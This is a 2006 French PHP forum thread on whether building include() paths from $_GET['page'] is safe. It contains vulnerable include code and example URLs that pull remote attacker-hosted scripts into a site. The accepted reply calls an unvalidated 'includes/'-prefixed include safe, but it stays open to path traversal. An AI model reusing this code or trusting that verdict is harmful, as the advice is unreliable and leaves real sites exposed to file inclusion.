Accueil > Forum > > > > include et securité
 include et securité
dimanche 25 juin 2006 à 13:06:06 |
include et securité
craso
|
bonjour, je veux savoir si ma facon d'incluredes fichiers est sans faille, vu que je débute, je ne peux pas le dire. Tous les liens sont du type "index.php?page=ma_page". J'extrait $_GET['page'], et j'inclus la page "$_GET['page'].php". C'est simple mais je ne sais pas s'il y a une faille ou pas. Voici le code: <?php $ext = '.php'; extract($_GET); if (isset($page) ) { include($page.$ext); //ns appelons le contenu de la page centrale } else { include('accueil.php'); //page par defaut qunad elle n'existe pas ds le tablo } ?> Merci d'avance pour vos réponses. |
|
dimanche 25 juin 2006 à 13:14:42 |
Re : include et securité
craso
|
a l'origine le code etait comme ca (je sais pas pourquoi je l'ai changé):
<?php
$ext = '.php';
$dossier = 'includes/';
extract($_GET);
if (isset($page) )
{
include($dossier.$page.$ext); //ns appelons le contenu de la page centrale
}
else
{
include('accueil.php'); //page par defaut qunad elle n'existe pas ds le tablo
}
?>
|
|
dimanche 25 juin 2006 à 15:22:13 |
Re : include et securité
xactise
|
oui elle peut être dangeureuse ta façon d'inclure ta page
je t'explique
tu verifie si uen page a été passer en parametre sa c'est d'accord
et ensuite tu l'inclu directement
c'est sa qui est pas bon
en effet si je fait :
http://www.ton-site.com/index.php?page=http://www.mon-site.com/ma_page_dangeusereuse
ton site va inclure mon fichier dangeureux provenant de mon site
rajoute la condition
if(file_exists($page))
sa verifie si la page envoyer en parametre existe sur le serveur
|
|
dimanche 25 juin 2006 à 16:04:42 |
Re : include et securité
craso
|
même s'il s'agit d'une page dans un dossier ? Avec ton exemple, mon index va vouloir afficher "mon_dossier_include/http://www.mon-site.com/ma_page_dangeusereuse", non?
|
|
mardi 27 juin 2006 à 12:03:48 |
Re : include et securité
coucou747
|
Salut, ton premier exemple est dangereux, mais le second non... il est cependant crade : on ne doit jamais faire extract car tu as des noms de variables qui peuvent être écrasés.... In a dream, I saw me, drop dead... U was there, U cried... It was just a dream, if I die, U won't cry, maybe, U'll be happy Mon site (articles sur la programmation et programmes) |
|
mardi 27 juin 2006 à 12:03:49 |
Re : include et securité
coucou747
|
Salut, ton premier exemple est dangereux, mais le second non... il est cependant crade : on ne doit jamais faire extract car tu as des noms de variables qui peuvent être écrasés.... In a dream, I saw me, drop dead... U was there, U cried... It was just a dream, if I die, U won't cry, maybe, U'll be happy Mon site (articles sur la programmation et programmes) |
|
mardi 27 juin 2006 à 12:07:45 |
Re : include et securité
craso
|
qu'est-ce que tu veux dire quand tu dis :" on ne doit jamais faire extract car tu as des noms de variables qui peuvent être écrasés...."
|
|
mardi 27 juin 2006 à 12:13:01 |
Re : include et securité
coucou747
|
Salut, <?php $var='print'; extract($_GET) $var($page); ?> là par exemple, si l'interaute fais : page.php?var=include&page=http://monsite.com/jetehacke.php bah t'as plus de site.... In a dream, I saw me, drop dead... U was there, U cried... It was just a dream, if I die, U won't cry, maybe, U'll be happy Mon site (articles sur la programmation et programmes) |
|
mardi 27 juin 2006 à 12:15:19 |
Re : include et securité
craso
|
mon 2eme exemple est sûr ou pas, je ne sais plus.
|
|
mardi 27 juin 2006 à 12:27:29 |
Re : include et securité
coucou747
|
Réponse acceptée !
Salut, <?php $ext = '.php'; $dossier = 'includes/'; if (isset($_GET['page']) ) { include($dossier.$_GET['page'].$ext); //ns appelons le contenu de la page centrale } else { include('accueil.php'); //page par defaut qunad elle n'existe pas ds le tablo } ?> là t'es sur In a dream, I saw me, drop dead... U was there, U cried... It was just a dream, if I die, U won't cry, maybe, U'll be happy Mon site (articles sur la programmation et programmes)
|
|
Cette discussion est classée dans : page, php, include, get, securité
 Répondre à ce message
 Sujets en rapport avec ce message
Problème : Notice: Undefined index [ par dalma101 ]
Salut, je recode mon site dont voici un morceau de la première page "index.php" :
Aide pour correction script [ par fmd92 ]
BonjourJe voudrais pouvoir aller chercher des pages dans plusieurs repertoires différends.J'ai 2 scripts index.php<div style="MARGIN: 5px 20px
if (isset($_GET [ par kelm_by ]
salut tous le monde,je ne sais pas pourquoi ce code ne fonctione pas???????????????if (isset($_GET['l'])) {include 'l.php';}if (isset($_GET['id'])) {i
mise en page PHP/CSS [ par la_main_sur_le_katana ]
Bonjour,je suis entrain de faire une apllication PHP/MYSQL pour un site web et j'aurais une question concernant la mise en page d'une partie du site.
un include dans un include?? [ par val_lala ]
Bonjour,J'ai un petit soucis de include (a moins que ce soit une faute bete de lien...)Voila je dois expliquer vite fait l'arborescense du site pour e
Mise en page et liens pour site en PHP [ par fmd92 ]
BonjourJ'essaie de faire un site personnel en PHP, et je galère vraiment beaucoup. C'est vrai que je n'ai que très peu de connaissances en PHP.J'en ap
Actualiser un include PHP en JS [ par teamlesboss ]
Bonjour,je vous fais un petit plan simple de ce que je cherche à faire :-------[...]include('requeteSQL.php'); // Actualiser cet include toutes les 5
GET [ par HagRapMan ]
Coucou,J'ai ce petit bout de code : if (isset($_GET['xx'])){ include('./'.$_GET['xx'].'.php');}?>et je
Problème de redirection avec site multilingue [ par dalma101 ]
Salut, j'ai des soucis avec la mise à jour de mon site. Je tiens en effet à le passer en multilingue (français, anglais pour commencer) mais j'ai un p
ouvrir une page [ par jekifvb6 ]
Bonjour à toutes et tous,J'ai fait une page en php, dans laquelle j'ai placé un petit script tout simple qui fait une série de test, et en fonction de
 Livres en rapport
|
Derniers Blogs
 POUR RAPPEL ! LES SPéCIFICATIONS DES PROTOCOLES OFFICE ET SHAREPOINT SONT DISPONIBLES SUR MSDNPOUR RAPPEL ! LES SPéCIFICATIONS DES PROTOCOLES OFFICE ET SHAREPOINT SONT DISPONIBLES SUR MSDN par neodante
Quelle est le point commun entre : Microsoft il y a 10 ans et Apple aujourd'hui ? Réponse: avoir une politique de protocoles propriétaires et fermés :) Car pour rappel (si si je vous assure c'est important de le rappeler), la majorité des spécifications e...
Cliquez pour lire la suite de l'article par neodante JOYEUX ANNIVERSAIRE NIXJOYEUX ANNIVERSAIRE NIX par ebartsoft
Souhaitons un bon et joyeux anniversaire à notre hôte à tous, Nix.
Je ne le répéterais jamais assez mais sans lui rien ne serait possible. Il défit en permanence les lois de la gravité et comme il le dit si bien, si tu lui fais confiance ça devra...
Cliquez pour lire la suite de l'article par ebartsoft IMAGINE CUP 2012, MAKE A SIGN EN FINALEIMAGINE CUP 2012, MAKE A SIGN EN FINALE par junarnoalg
Voilà qui est fait, la nouvelle est officielle ! L'équipe belge "Make a Sign" va au pays des kangourous défendre son projet dans la catégorie Software Design. http://www.imaginecup.com/CompetitionsContent/Competition/WorldwideFinalists.aspx V...
Cliquez pour lire la suite de l'article par junarnoalg KINECT 1.5 IS OUT !KINECT 1.5 IS OUT ! par Vko
La version 1.5 du Kinect For Microsoft vient tout juste de sortir ! Plein de nouveautés: Tracking de squelette en Near Mode Détection en position assise Détection faciale avec un SDK dédié Documentation et des guideline (enfin) Un out...
Cliquez pour lire la suite de l'article par Vko LES ACTUALITéS DE LA SEMAINE SUR C2I.FR (14 MAI - 20 MAI) LES ACTUALITéS DE LA SEMAINE SUR C2I.FR (14 MAI - 20 MAI) par richardc
Mise à jour des Web API du 14 Mai
Réservez dès maintenant votre journée du 20 juin pour le Windows Azure Dev Camp 2012 à Paris
Mise à jour de Team Foundation Service
MechCommander 2 sur Windows 8
Entity Framework 5 Release Candidate e...
Cliquez pour lire la suite de l'article par richardc
Logiciels
 sDEVIS-FACTURES vlPRO (8.1.0.3)SDEVIS-FACTURES VLPRO (8.1.0.3)sDEVIS-FACTURES vlPRO a été mis au point pour les particuliers, créateurs, entrepreneurs, artisa... Cliquez pour télécharger sDEVIS-FACTURES vlPRO 974 Application Server (12.2.4.6)974 APPLICATION SERVER (12.2.4.6)Développez de puissantes applications dans un environnement de 'cloud computing', clusterisé, séc... Cliquez pour télécharger 974 Application Server vPicture (1.4.2.1)VPICTURE (1.4.2.1)Avec vPicture, hébergez vos images facilement et rapidement.
vPicture est un utilitaire simple, ... Cliquez pour télécharger vPicture Easy-Planning (2.2.1.6)EASY-PLANNING (2.2.1.6)Easy-Planning permet de créer des plannings sous la représentation de diagrammes et est adapté au... Cliquez pour télécharger Easy-Planning COM-BACKUP (2.0)COM-BACKUP (2.0)
COM-BACKUP est un logiciel de sauvegarde qui permet de planifier les sauvegardes de vos dossiers ...
Cliquez pour télécharger COM-BACKUP
|